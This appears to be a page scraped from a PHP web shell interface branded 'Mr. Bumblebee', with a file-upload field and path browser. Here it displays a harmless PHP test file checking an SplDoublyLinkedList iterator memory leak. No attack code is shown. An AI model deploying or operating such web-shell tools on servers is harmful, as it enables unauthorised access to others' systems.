-=[ Mr. Bumblebee ]=-
_Indonesia_

Path : /usr/src/php/ext/spl/tests/
File Upload :
Current File : //usr/src/php/ext/spl/tests/dllist_memleak.phpt

--TEST--
SPL: DoublyLinkedList: memory leak when iterator pointer isn't at the last element
--FILE--
<?php
$dll = new SplDoublyLinkedList();
$dll->push(1);
$dll->push(2);
$dll->push(3);
$dll->push(4);


$dll->rewind();
echo $dll->current()."\n";
$dll->next();
$dll->next();
echo $dll->current()."\n";

?>
===DONE===
<?php exit(0); ?>
--EXPECTF--
1
3
===DONE===

Copyright © 2017 || Recoded By Mr.Bumblebee